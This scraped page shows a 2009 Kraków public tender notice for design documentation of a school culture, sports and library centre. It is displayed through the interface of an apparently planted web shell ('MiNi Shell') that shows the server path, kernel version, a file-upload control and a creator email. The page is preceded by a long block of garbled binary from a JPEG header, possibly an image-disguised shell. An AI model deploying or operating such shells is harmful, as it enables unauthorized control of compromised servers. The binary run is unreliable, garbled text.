JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090309/47451-N-2009.html

<p class="kh_header"><b>Kraków: opracowanie dokumentacji projektowej na budowę Centrum Kultury i Rekreacji przy Zespole Szkół Ogólnokształcących Integracyjnych Nr 7 w Krakowie, ul. Czarnogórska 14</b><br>
<b>Numer ogłoszenia: 47451 - 2009; data zamieszczenia: 09.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiki Oświaty Kraków - Wschód , ul. Fatimska 8, 31-831 Kraków, woj. małopolskie, tel. 012 6414474 wew. 370, faks (012) 641 44 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zeowschod.w.interia.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie dokumentacji projektowej na budowę Centrum Kultury i Rekreacji przy Zespole Szkół Ogólnokształcących Integracyjnych Nr 7 w Krakowie, ul. Czarnogórska 14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotowa dokumentacja winna być opracowana w fazie dokumentacji budowlanej i wykonawczej pełnobranżowej wraz z kosztorysami inwestorskimi, przedmiarami i specyfikacjami robót na budowę: 
1. sali gimnastycznej z zapleczem oraz 3 pomieszczeniami do nauki z uwzględnieniem następujących założeń:
Sala gimnastyczna o wymiarach 19,0 x 32,0 mb, zaplecze przedmiotowej sali połączone przewiązką z Zespołem Szkół Ogólnokształcących Integracyjnych Nr 14. 
Konstrukcja sali mieszana prefabrykowano tradycyjna, podłoga sportowa typu Masters na legarach drewnianych. Dodatkowo sala gimnastyczna umożliwiać ma udział widowni podczas rozgrywek sportowych. 
2. pomieszczeń dla działalności Klubu Osiedlowego Wola Duchacka - Wschód                        z uwzględnieniem  następujących założeń:
- sala widowiskowa o wymiarach 20,0 x 10 m tym scena ok. 50 m2, wykończenie - parkiet,  adaptacja akustyczna,
- hall - 30 m2 (z mini kawiarenką i pow. wystawienniczą),
- sala prób - 20 m2 (maksymalnie wyciszona i oddalona od innych pomieszczeń),
- studio nagrań - 16 m2, (sąsiaduje z salą prób - okno pomiędzy nimi, wykończenie: adaptacja
  akustyczna, wyciszenie),
- pracownia muzyczna I - 16 m2 (zajęcia wokalne, instrumenty klawiszowe, wykończenie: 
  wyciszenie),
- pracownia muzyczna II - 12 m2 (gitara, wokal, wykończenie: wyciszenie),
- galeria - pracowni plastyczna - 30 m2,
- sala baletowa - 40 m2 (lustra na ścianie, parkiet, panele),
- biuro - 12 m2,
- pomieszczenie gospodarcze / kuchnia - 12 m2 (blisko sali widowiskowej),
- magazyn - 12 m2,
- wc - 30 m2 (męski, damski i pracowników),
- świetlica / zajęcia sportowe - 30 m2 (stół ping pong, internet, piłkarzyki),
- pomieszczenie na stowarzyszenia - 20 m2,
- pomieszczenie na stow., stretwork - 20 m2.
Łączna powierzchnia pomieszczeń - 500 m2.
- taras - 50 m2 (wychodzący na boisko, może służyć jako scena plenerowa).
3. biblioteki publicznej z uwzględnieniem następujących założeń:
Planowana powierzchnia biblioteki winna wynosić 250 m2 w tym:
- wypożyczalnia dla dorosłych - 60 m2
- wypożyczalnia dla dzieci - 40 m2
- czytelnia informacyjna - 45 m2
- sala audio-wizualna - 40 m2
- pomieszczenie socjalne - 10 m2
- zaplecze introligatorskie - 12 m2
- zaplecze gospodarcze - 6 m2
- węzeł sanitarny - 10 m2
- pomieszczenie magazynowe - 6 m2
- ciągi komunikacyjne - 21 m2
Przewidujemy też wyposażenie placówki w urządzenia audiowizualne, stanowiska komputerowe, aparaturę oglądową i słuchową. Zainstalowana będzie także kserokopiarka, monitory telewizyjne i elementy ekspozycyjne sali wystawowej. W planowanej bibliotece przestrzeń użytkowa powinna być maksymalnie przeszklona.
Budynek biblioteki i klubu osiedlowego rozdzielony pod względem funkcjonalnym                       i instalacyjnym, oddzielne wejścia, oddzielne opomiarowania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, niepodlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy PZP, a w szczególności:
1. posiadają uprawnienia do wykonywania określonej działalności, 2. posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, tj. wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia -    a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - co najmniej dwie usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, 3. dysponują osobami zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje zawodowe konieczne do wykonania zamówienia, tj.: 
3.1. dysponują co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej, 3.2. dysponują co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjnej, 3.3. dysponują co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w zakresie instalacji elektrycznych, 3.4. dysponują co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w zakresie instalacji sanitarnych. Wszystkie w/w osoby muszą posiadać aktualne zaświadczenie                       o członkostwie w izbie właściwego samorządu zawodowego, 4. znajdują się                  w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.: 
4.1. uzyskali w ostatnim roku obrotowym (a jeżeli okres działalności jest krótszy -             w tym okresie) przychód w wysokości co najmniej 150.000,00 zł. Za spełniającego warunki udziału w postępowaniu uznany zostanie Wykonawca, który złoży oświadczenia i dokumenty, o których mowa w Sekcji III.2) a)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a) 1. Oświadczenie Wykonawcy - wypełnione i podpisane odpowiednio przez osoby upoważnione do reprezentowania Wykonawcy (na druku stanowiącym załącznik nr 2A do specyfikacji) albo przez Pełnomocnika reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia (na druku stanowiącym załącznik nr 2B do specyfikacji). 2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 3. Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia (na druku stanowiącym załącznik nr 3 do specyfikacji).
4. Dokumenty stwierdzające, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia, wymieniona w wykazie, o którym mowa w pkt powyżej posiada wymagane uprawnienia do projektowania w specjalności architektonicznej wraz                 z aktualnym zaświadczeniem o członkostwie w izbie właściwego samorządu zawodowego. 5. Dokumenty stwierdzające, że osoba, która będzie uczestniczyć               w wykonywaniu zamówienia, wymieniona w wykazie, o którym mowa w pkt 3 posiada wymagane uprawnienia do projektowania w specjalności konstrukcyjnej wraz z aktualnym zaświadczeniem o członkostwie w izbie właściwego samorządu zawodowego. 6. Dokumenty stwierdzające, że osoba, która będzie uczestniczyć                w wykonywaniu zamówienia, wymieniona w wykazie, o którym mowa w pkt 3 posiada wymagane uprawnienia do projektowania w specjalności instalacji sanitarnych wraz z aktualnym zaświadczeniem o członkostwie w izbie właściwego samorządu zawodowego. 7. Dokumenty stwierdzające, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia, wymieniona w wykazie, o którym mowa w pkt 3 posiada wymagane uprawnienia do projektowania w specjalności instalacji elektrycznych wraz z aktualnym zaświadczeniem o członkostwie w izbie właściwego samorządu zawodowego. 8. Wykaz wykonanych usług (przynajmniej dwóch) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością usługom stanowiących przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (wypełniony i popisany przez osoby upoważnione do reprezentowania wykonawcy na druku stanowiącym załącznik nr 4 do SIWZ) oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie. 9. Rachunek zysków i strat, a jeżeli podlega on badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanej części sprawozdania albo w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, inne dokumenty określające wysokość obrotów - za ostatni rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. b) Wykonawca jest zobowiązany złożyć również w ofercie: 1. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej. 2. Wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy formularz ofertowy (zał. Nr 1), 3. Wzór Umowy (zał. Nr 5) podpisany przez Wykonawcę, co stanowi zobowiązanie się Wykonawcy do zawarcia umowy sporządzonej zgodnie ze wzorem. c) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy Pzp. 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. wspólnicy spółki cywilnej lub członkowie konsorcjum) są zobowiązani ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo pełnomocnika do reprezentowania ich w postępowaniu i do zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Pełnomocnictwo w formie oryginału lub jego notarialny odpis musi znajdować się w ofercie wspólnej wykonawców. 2. W takim przypadku - oprócz dokumentów wymienionych w Sekcji III.2) a), b) - wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt 1. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają (podpisane przez ustanowionego Pełnomocnika lub potwierdzone przez niego za zgodność z oryginałem): 3.1. każdy  z osobna - dotyczące ich dokumenty wymienione w Sekcji III.2) a) pkt. 2; 3.2. Oświadczenie Pełnomocnika wykonawców wspólnie ubiegających się o udzielenie zamówienia - wg załącznika 2B do specyfikacji (dokument wymieniony w Sekcji III.2) a) pkt. 1.). 3.3. dokumenty wymienione w Sekcji III.2) a) pkt. 3, 4,5, 6, 7 ,8, 9 oraz w Sekcji III.2) b) pkt. 2 i 3. 4. W przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie zamówienia publicznego spełnianie warunków udziału w postępowaniu wymienionych w  Sekcji III.2) oceniane będzie łącznie. 5. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem. 6. Wykonawcy składający ofertę wspólną podlegają wykluczeniu  z postępowania, gdy okoliczność skutkująca wykluczeniem Wykonawcy dotyczy któregokolwiek z nich..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> zeowschod.w.interia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiki Oświaty Kraków-Wschód, ul. Fatimska 8, 31-831 Kraków, Budynek C, pokój 07, pn-pt 7.30-15.00. Cena SIWZ: 4,20 zł + koszty przesyłki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2009 godzina 07:50, miejsce: Zespół Ekonomiki Oświaty Kraków-Wschód, ul. Fatimska 8, 31-831 Kraków, Budynek A, pokój 13, pn-pt 7.30-15.00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com